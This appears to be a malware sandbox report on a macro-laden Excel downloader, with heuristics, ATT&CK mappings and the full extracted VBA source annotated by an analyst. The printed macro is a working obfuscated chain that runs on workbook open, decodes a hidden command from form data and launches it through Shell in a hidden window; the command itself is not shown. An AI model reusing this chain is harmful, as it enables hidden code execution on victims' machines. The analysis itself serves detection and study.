MALICIOUS
120
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
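The file is an Excel document containing a Workbook_Open VBA macro, a common technique for running malicious code automatically when the document is opened. The ClamAV heuristic identifies it as a downloader, suggesting it is designed to fetch and execute additional payloads. The VBA macro is the primary mechanism for this execution: in the extracted source below, Workbook_Open sets off a chain of form-control Change events that decodes a string held in a form field and passes it to Shell. The decoded command is not part of the macro text, so the downloader classification rests on the ClamAV detection rather than on a URL visible in this listing.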
Heuristics 3
-
ClamAV: Doc.Downloader.00536d-6755246-0 | critical | CLAMAV_DETECTION | ClamAV detected this file as malware: Doc.Downloader.00536d-6755246-0
-
VBA macros detected | medium | 1 related finding | OLE_VBA_MACROS | Document contains VBA macro code
-
Workbook_Open macro | high | OLE_VBA_WBOPEN | Workbook_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3670 bytes |

SHA-256: 92b879f1bef319e8e253b4f48f024ac352580560ad99eef3f3b5f634924f60fb
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Auto-run entry point in the ThisWorkbook module: Excel calls Workbook_Open
' when the workbook is opened with macros enabled, so the chain below starts
' without further user action (this is what the OLE_VBA_WBOPEN finding flags).
' The literal "2410" is only handed to start_main_dialog1, which writes it into
' dialog1.TextBox1. Nothing in this listing reads the value back, so it appears
' to serve purely as a trigger for the TextBox1_Change handler.
Sub Workbook_Open()
s1 = "2410"
start_main_dialog1 s1
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "dialog1"
Attribute VB_Base = "0{D4C5605C-74E4-430D-9758-CD27AF03860E}{AC8D0F7F-F6FB-4E42-960A-740F2A154DCB}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Code-behind of the dialog1 form. Analyst summary: only TextBox1_Change and
' LastText_Change do any work. The control flow is carried by Change events that
' fire when other procedures assign to the form's controls, which hides the call
' graph from a plain top-to-bottom read. The remaining handlers are empty or only
' touch unused locals.

' Empty handler (no behaviour).
Private Sub CommandButton1_Click()
End Sub
' Empty handler (no behaviour).
Private Sub CommandButton2_Click()
End Sub
' Empty handler (no behaviour).
Private Sub ComboBox1_Change()
End Sub
' Raised when replaceCharsInLeter writes the decoded string into EditText1.
' The local ind1 is assigned and never used: filler with no effect.
Private Sub EditText1_Change()
Dim ind1 As String
ind1 = "1006"
End Sub
' First link of the chain: writing any value into TextBox1 (done by
' start_main_dialog1) lands here and starts the decode in replaceCharsInLeter.
Private Sub TextBox1_Change()
replaceCharsInLeter
End Sub
' Last link of the chain: raised when replaceCharsInLeter copies the decoded
' string into LastText. lev2 and fh are assigned but never read (filler).
' Only the length of LastText is passed on; replaceCharsInLeter2 uses it as the
' gate for its Shell call.
Private Sub LastText_Change()
lev2 = "03"
lev1 = Len(dialog1.LastText)
fh = "04"
replaceCharsInLeter2 lev1
End Sub
' Empty handler. Note that the date1 control is read as the encoded input by
' replaceCharsInLeter; its value is not part of this macro source.
Private Sub date1_Change()
End Sub
' Empty handler (no behaviour).
Private Sub TextBox2_Change()
End Sub
Attribute VB_Name = "Module1"
' Decode wrapper: clears the ByRef output op, sets the 1-based start index and
' lets replaceChars walk every character of Cell1.
'   Cell1 - encoded input (the caller in this listing passes dialog1.date1)
'   op    - ByRef; receives the decoded string
Sub chars_replace(Cell1, ByRef op)
st1 = 1
op = ""
replaceChars st1, op, Cell1
End Sub
' Recursive per-character decoder (one recursion level per input character
' instead of a loop). For the character of `later` at position pointA:
'   1. fine extracts that character into ch.
'   2. dial_total_price looks ch up in dialog1.Text1 and returns its 1-based
'      index in idial (0 when no match was found).
'   3. dial_pivot returns the Text1 character at index idial - 2, wrapping to
'      the end of Text1 when that index is below 1.
'   4. The result is appended to need and pointA is advanced.
' Net effect: a substitution decode that shifts each character two positions
' back within the alphabet stored in dialog1.Text1.
'   pointA - ByRef current 1-based position; the caller's variable is advanced
'   need   - ByRef accumulator for the decoded output
'   later  - encoded input string
Sub replaceChars(ByRef pointA, ByRef need, later)
f_str = Len(later)
If pointA <= f_str Then
ch = ""
fine later, pointA, ch
idial = 1
dial_total_price ch, idial
st = ""
dial_pivot idial - 2, st
need = need + st
pointA = pointA + 1
replaceChars pointA, need, later
End If
End Sub
' Decodes the value of the dialog1.date1 control and stages the result:
' chars_replace writes the decoded text into level, which is stored in
' EditText1 and then copied into LastText. The assignment to LastText raises
' LastText_Change, which forwards the string length to replaceCharsInLeter2.
' NOTE(review): the encoded input (date1) and the lookup alphabet (Text1) are
' form control values and do not appear anywhere in this macro text; presumably
' they are stored with the form's control data inside the document, so static
' recovery of the decoded command needs that data as well as this source.
Sub replaceCharsInLeter()
Dim level As String
chars_replace dialog1.date1, level
dialog1.EditText1 = level
dialog1.LastText = dialog1.EditText1
End Sub
' Writes string1 into dialog1.TextBox1. The assignment is what matters here:
' changing the control's value raises TextBox1_Change, which starts the decode.
Sub start_main_dialog1(string1)
dialog1.TextBox1 = string1
End Sub
' Recursive linear search for the character ActiveCellInTable inside
' dialog1.Text1, starting at 1-based position b1.
'   b1      - ByRef current position; advanced on every mismatch
'   control - ByRef result; set to the matching position, left untouched when
'             nothing matches
' The first assignment to log2 is dead code (immediately overwritten).
' Because the guard is b1 < log2, the final character of Text1 is never compared.
Sub dial_scrub_multi(ByRef b1, ByRef control, ActiveCellInTable)
log2 = 1
log2 = Len(dialog1.Text1)
If b1 < log2 Then
b = ""
fine dialog1.Text1, b1, b
If ActiveCellInTable <> b Then
b1 = b1 + 1
dial_scrub_multi b1, control, ActiveCellInTable
Else
control = b1
End If
End If
End Sub
' Returns, through ByRef state_min, the single character of ARG1 at 1-based
' position pointB: Left keeps the first pointB characters and Right(…, 1) takes
' the last of them. For positions inside the string this matches
' Mid(ARG1, pointB, 1); the indirect form and the no-op "" + s1 concatenation
' look like obfuscation padding.
Sub fine(ARG1, pointB, ByRef state_min)
s1 = Left(ARG1, pointB)
s1 = "" + s1
state_min = Right(s1, 1)
End Sub
' Execution sink of the macro: the only place in this listing that starts a
' process. i is the length of dialog1.LastText (see LastText_Change).
' - The guard 429 - i = 0 lets Shell run only when the decoded string is exactly
'   429 characters long, so a partial or failed decode is never executed.
' - The window-style argument i - 4 * 105 - 9 evaluates to 0 when i = 429,
'   which is vbHide: the launched process gets a hidden window. The arithmetic
'   keeps the constant out of the source text.
' - Shell receives the decoded contents of dialog1.LastText as its command line.
' Triage note: a successful run shows up as a child process of Excel, which
' process-creation telemetry can alert on.
Sub replaceCharsInLeter2(i)
With dialog1
If 429 - i = 0 Then Shell .LastText, i - 4 * 105 - 9
End With
End Sub
' Index lookup wrapper: returns in ByRef ARG2 the 1-based position of the
' character addper4 within dialog1.Text1, as found by dial_scrub_multi scanning
' from position 1. ARG2 stays 0 when dial_scrub_multi reports no match.
Sub dial_total_price(addper4, ByRef ARG2)
ARG2 = 0
sub2 = 1
dial_scrub_multi sub2, ARG2, addper4
End Sub
' Returns, through ByRef state_max, the character of dialog1.Text1 selected by
' pointer. A pointer below 1 is taken relative to the end of Text1
' (Len(Text1) + pointer), which provides the wrap-around for the shifted
' lookup; otherwise pointer is used directly as a 1-based position.
' The first If block assigns pointer its own value and has no effect.
Sub dial_pivot(pointer, ByRef state_max)
state_max = ""
If pointer = -1 Then
pointer = -1
End If
If pointer < 1 Then
fine dialog1.Text1, Len(dialog1.Text1) + pointer, state_max
Else
fine dialog1.Text1, pointer, state_max
End If
End Sub
|
|||